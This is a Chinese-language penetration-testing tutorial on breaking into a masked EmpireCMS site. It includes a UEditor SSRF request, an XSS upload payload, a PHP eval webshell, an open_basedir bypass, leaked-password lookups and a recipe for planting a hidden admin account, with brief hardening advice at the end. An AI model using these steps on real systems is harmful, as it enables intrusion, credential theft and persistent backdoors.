帝国CMS渗透测试实战教学文档<\/h1>

0x01 信息收集阶段<\/h2>

1.1 基础信息探测<\/h3>

目标站点：http:\/\/www.xxxxx.org.cn<\/li>

CMS识别：通过路径特征识别为帝国CMS

常见后台路径：\/e\/admin<\/li>
前台登录路径：\/e\/member\/login\/<\/li> <\/ul> <\/li>

版本推测：可能为帝国CMS 7.2版本（通过页面信息推断）<\/li> <\/ul>

1.2 端口扫描发现<\/h3>

发现开放27017端口（MongoDB默认端口）<\/li>

尝试空密码连接失败（注意：可能是误报，需验证）<\/li> <\/ul>

1.3 用户信息收集<\/h3>

通过会员列表发现admin账户<\/li>
通过\/e\/space\/?userid=1获取用户邮箱信息<\/li>

使用社工库(SGK)获取前台密码<\/li> <\/ul>

0x02 漏洞利用阶段<\/h2>

2.1 UEditor漏洞利用<\/h3>

发现路径：\/e\/data\/ecmseditor\/ueditor\/<\/li>
版本确认：1.4.3（通过控制台执行console.log(UE.version)<\/code>）<\/li>

SSRF漏洞：
\/e\/data\/ecmseditor\/ueditor\/php\/controller.php?action=catchimage&source[]=https:\/\/www.baidu.com\/img\/baidu_jgylogo3.gif
<\/code><\/pre>
<\/li>
文件上传绕过：

上传图片时抓包<\/li>
修改uploadimage<\/code>为uploadfile<\/code><\/li>
修改文件后缀为xml<\/li>
插入XSS payload：<\/li>
<\/ol>
<html><head><\/head><body><something:script<\/span> xmlns:something=<\/span>"http:\/\/www.w3.org\/1999\/xhtml"<\/span>><\/span>alert(1);<\/something:script><\/body><\/html><\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
2.2 旁站攻击<\/h3>

通过HTTPS报错信息发现旁站：livexxxxxx.com<\/li>
确认同服务器（通过ping检测相同IP）<\/li>
旁站发现：

扫码登录功能<\/li>
文件上传漏洞（可直接上传PHP文件）<\/li>
使用哥斯拉Webshell成功获取权限<\/li>
<\/ul>
<\/li>
<\/ul>
0x03 权限提升与横向移动<\/h2>
3.1 突破目录限制<\/h3>

环境限制：宝塔面板，disable_functions限制严格<\/li>
绕过方法：

创建.user.ini文件：<\/li>
<\/ol>
open_basedir=:\/
<\/code><\/pre>

创建user.php文件：<\/li>
<\/ol>
<?<\/span>php<\/span> eval<\/span>($_POST["pass"<\/span>]) ?><\/span>
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
3.2 数据库访问<\/h3>

配置文件路径：\/e\/config\/config.php<\/li>
使用哥斯拉连接数据库<\/li>
发现228个站点共享同一数据库<\/li>
<\/ul>
0x04 帝国CMS后台账户创建分析<\/h2>
4.1 账户创建问题<\/h3>

直接数据库添加账户无法登录<\/li>
通过分析源码发现需要满足以下条件：

enewsuser表中必须有有效记录<\/li>
enewsuseradd表中必须有对应的userid记录<\/li>
密码加密方式为DoEmpireCMSAdminPassword($password,$salt,$salt2)<\/code><\/li>
<\/ol>
<\/li>
<\/ul>
4.2 正确添加后台账户步骤<\/h3>

在enewsuser表中添加记录：

包含username, password, salt, salt2等字段<\/li>
password需使用DoEmpireCMSAdminPassword<\/code>函数加密<\/li>
<\/ul>
<\/li>
在enewsuseradd表中添加对应userid的记录<\/li>
确保checked=0（表示已审核）<\/li>
<\/ol>
4.3 关键验证代码分析<\/h3>
\/\/ 密码验证
<\/span><\/span><\/span><\/span>$ch_password=<\/span>DoEmpireCMSAdminPassword<\/span>($password,$user_r['salt'<\/span>],$user_r['salt2'<\/span>]);
<\/span><\/span>if<\/span>($user_r['password'<\/span>]!=<\/span>$ch_password) {
<\/span><\/span>    printerror<\/span>("LoginFail"<\/span>,"index.php"<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ enewsuseradd表验证
<\/span><\/span><\/span><\/span>$user_addr=<\/span>$empire-><\/span>fetch1<\/span>("select userid,equestion,eanswer,openip,certkey from <\/span>{<\/span>$dbtbpre}<\/span>enewsuseradd where userid='<\/span>$user_r[userid]<\/span>'"<\/span>);
<\/span><\/span>if<\/span>(!<\/span>$user_addr['userid'<\/span>]) {
<\/span><\/span>    printerror<\/span>("LoginFail"<\/span>,"index.php"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>0x05 后台getshell方法<\/h2>
5.1 通过备份数据查看phpinfo<\/h3>

利用后台备份功能获取服务器配置信息<\/li>
<\/ul>
5.2 系统模型导入漏洞<\/h3>

即使功能点被隐藏，仍可通过抓包改包利用<\/li>
关键步骤：

拦截正常请求<\/li>
修改为模型导入请求<\/li>
插入恶意代码<\/li>
<\/ol>
<\/li>
<\/ul>
0x06 防御建议<\/h2>


权限控制<\/strong>：<\/p>

严格限制文件上传类型<\/li>
禁用不必要的PHP函数<\/li>
<\/ul>
<\/li>

目录安全<\/strong>：<\/p>

设置正确的open_basedir<\/li>
防止目录遍历<\/li>
<\/ul>
<\/li>

帝国CMS加固<\/strong>：<\/p>

修改默认后台路径<\/li>
及时更新补丁<\/li>
禁用不必要的编辑器功能<\/li>
<\/ul>
<\/li>

数据库安全<\/strong>：<\/p>

使用强密码<\/li>
限制远程连接<\/li>
<\/ul>
<\/li>

服务器安全<\/strong>：<\/p>

定期检查旁站安全性<\/li>
使用WAF防护常见攻击<\/li>
<\/ul>
<\/li>
<\/ol>
0x07 总结<\/h2>
本案例展示了从信息收集到最终获取帝国CMS后台权限的完整渗透流程，重点包括：<\/p>

通过旁站突破获取初始权限<\/li>
利用.user.ini突破目录限制<\/li>
分析帝国CMS账户验证机制<\/li>
数据库直接添加后台账户的技术细节<\/li>
<\/ul>
渗透过程中体现了"迂回攻击"的思想，当直接攻击目标受阻时，通过旁站、目录突破等方式最终达成目标。<\/p>